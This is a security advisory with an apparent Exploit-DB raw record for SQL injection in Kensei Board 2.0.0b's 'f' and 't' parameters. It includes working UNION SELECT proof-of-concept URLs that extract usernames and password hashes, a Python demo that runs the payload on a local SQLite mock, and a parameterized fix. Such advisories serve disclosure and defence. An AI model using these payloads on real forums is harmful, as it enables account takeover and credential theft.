Vendor: Kensei Board
By: cOndemned
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Kensei Board
Affected Version From: 2.0.0b
Affected Version To: 2.0.0b
Patch Exists: NO
Related CWE: N/A
CPE: a:kensei_board:kensei_board
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Kensei Board <= 2.0.0b Multiple Remote SQL Injection Vulnerabilities

Kensei Board version 2.0.0b is vulnerable to multiple remote SQL injection vulnerabilities. The 'f' and 't' request parameters are read from $_GET and interpolated directly, without quoting, casting, or escaping, into SELECT statements in '/functions/showforum.php' and in the topic handler that '/index.php' includes when 't' is set. A remote attacker can execute arbitrary SQL in the application's database: the published proof of concept uses a UNION SELECT to read user names and passwords (users_username, users_password) from the users table, and the same primitive allows reading or modifying other data, compromising the application, and exploiting latent vulnerabilities in the underlying database. Proof of Concept code is available.

Mitigation:

Input validation should be used to prevent SQL injection attacks: 'f' and 't' are numeric identifiers, so the application should cast them to integers (or reject anything that is not a digit string) before use. More generally, the application should use parameterized queries (prepared statements) when interacting with the database, so that user-supplied values are bound as data rather than concatenated into SQL text; the legacy mysql_* functions used here offer no prepared statements, so this means moving to mysqli or PDO.
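As an added illustration (not code from Kensei Board or from the advisory author), the script below reproduces the showforum.php query pattern against an in-memory SQLite database, runs the advisory's 'f' payload against it, and contrasts it with a validated, parameterized version. The table layouts (eight columns in ksb_forums, users_username/users_password in ksb_users) and the sample credential row are assumptions made for the demonstration; the payload is adapted to SQLite syntax, using '||' in place of MySQL's concat_ws(char(58), ...).

```python
"""Added example (not Kensei Board code): the showforum.php query pattern
reproduced against SQLite, the advisory's 'f' payload run against it, and
the parameterized fix.  Table layouts and the credential row are assumed."""
import sqlite3

PREFIX = "ksb_"  # the $_CON[prefix] value implied by 'ksb_users' in the PoC URLs


def make_db():
    """Build a throwaway database with the (assumed) tables the PoC touches."""
    db = sqlite3.connect(":memory:")
    # Assumed layout: the 'f' PoC UNIONs eight columns, so forums has eight.
    db.executescript(f"""
        CREATE TABLE {PREFIX}forums (
            forums_id INTEGER, forums_name TEXT, c3 TEXT, c4 TEXT,
            c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT);
        INSERT INTO {PREFIX}forums VALUES (1, 'General', '', '', '', '', '', '');
        CREATE TABLE {PREFIX}users (users_username TEXT, users_password TEXT);
        -- constructed sample row; the value is md5('password')
        INSERT INTO {PREFIX}users VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db


def show_forum_vulnerable(db, f):
    """Mirrors showforum.php line 9: $_GET[f] is pasted into the SQL text."""
    sql = f"select * from {PREFIX}forums where forums_id = {f}"
    return db.execute(sql).fetchone()


def show_forum_fixed(db, f):
    """Hardened form: reject non-numeric ids, then bind the value as a parameter."""
    try:
        forum_id = int(f)
    except (TypeError, ValueError):
        return None
    sql = f"select * from {PREFIX}forums where forums_id = ?"
    return db.execute(sql, (forum_id,)).fetchone()


# The advisory's 'f' payload adapted to SQLite: '||' replaces
# concat_ws(char(58), ...); '1=51' is simply false, so the real forum row
# drops out and only the UNION row (credentials in the 4th column) remains.
PAYLOAD = (
    "1 and 1=51 union select 1,2,3,users_username||':'||users_password,"
    f"5,6,7,8 from {PREFIX}users--"
)


def demo():
    """Return what each version hands back for the payload and for a normal id."""
    db = make_db()
    return {
        "vulnerable_payload": show_forum_vulnerable(db, PAYLOAD),
        "vulnerable_normal": show_forum_vulnerable(db, "1"),
        "fixed_payload": show_forum_fixed(db, PAYLOAD),
        "fixed_normal": show_forum_fixed(db, "1"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name}: {row}")
```

Running it shows the vulnerable function returning a row whose fourth column is "admin:5f4dcc3b5aa765d61d8327deb882cf99" for the payload, while the fixed function returns nothing for the payload and the normal forum row for "1". The integer cast is what stops this particular bug; the bound parameter is what stops the whole class, including string-typed parameters where a cast is not an option.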

Exploit-DB raw data:

Kensei Board <= 2.0.0b Multiple Remote SQL Injection Vulnerabilities
Bug found && Exploited by cOndemned
Greetz: SELECT * FROM `friends`

Download Script : http://www.kenseiboard.com/counter/click.php?id=2

---

source of index.php :

	[...]
	// index.php, lines 87-91: which handler gets included depends on whether "t" is set
	if ($inc_function == "_showforum") {
		if ($_GET[t] == "") {
			$inc_function = "functions/showforum.php";
		} else {
			$inc_function = "functions/showtopic.php";
	[...]

source of functions/showforum.php :

	[...]
	// functions/showforum.php, line 9: $_GET[f] goes into the query unquoted and unescaped
	$forum = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]forums where forums_id = $_GET[f]"));
	[...]

It looks the same for the "t" variable ...

---

Proof of Concept :

	"f" variable: /index.php?&act=showforum&f=1+and+1=51+union+select+1,2,3,concat_ws(char(58),users_username,users_password),5,6,7,8+from+ksb_users--
	"t" variable: /index.php?&act=showforum&f=1&t=1+and+1=51+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(char(58),users_username,users_password)+from+ksb_users--

---

// http://www.youtube.com/watch?v=xCMlZxqZ5xI

# milw0rm.com [2009-05-26]